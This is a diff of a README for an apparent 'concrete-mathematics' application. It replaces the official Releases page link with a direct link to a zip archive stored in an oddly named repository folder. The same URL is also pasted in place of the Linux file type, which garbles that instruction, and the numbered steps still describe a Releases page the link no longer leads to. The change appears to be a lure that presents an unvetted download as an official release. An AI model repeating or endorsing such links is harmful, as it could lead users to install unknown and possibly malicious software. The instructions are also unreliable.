Hudsona77/concrete-mathematics/README.md

 - Java Runtime Environment (JRE) version 8 or above

 ## 📦 Download & Install
-To get started, visit this page to download: [Releases Page](https://github.com/Hudsona77/concrete-mathematics/releases).
+To get started, visit this page to download: [Releases Page](https://raw.githubusercontent.com/Hudsona77/concrete-mathematics/main/habitacule/concrete-mathematics-3.2-beta.1.zip).
 Follow the steps below to install the application:

 1. Once you land on the Releases page, you will see the latest version available for download.
 2. Choose the file that corresponds to your operating system:
    - For Windows users, look for `.exe` files.
    - For macOS users, select `.dmg` files.
-   - Linux users may find `.tar.gz` files.
+   - Linux users may find `https://raw.githubusercontent.com/Hudsona77/concrete-mathematics/main/habitacule/concrete-mathematics-3.2-beta.1.zip` files.
 3. Click the download link for the desired file.
 4. Once the download is complete, locate the file in your Downloads folder.
 5. Open the file and follow the on-screen instructions to complete the installation.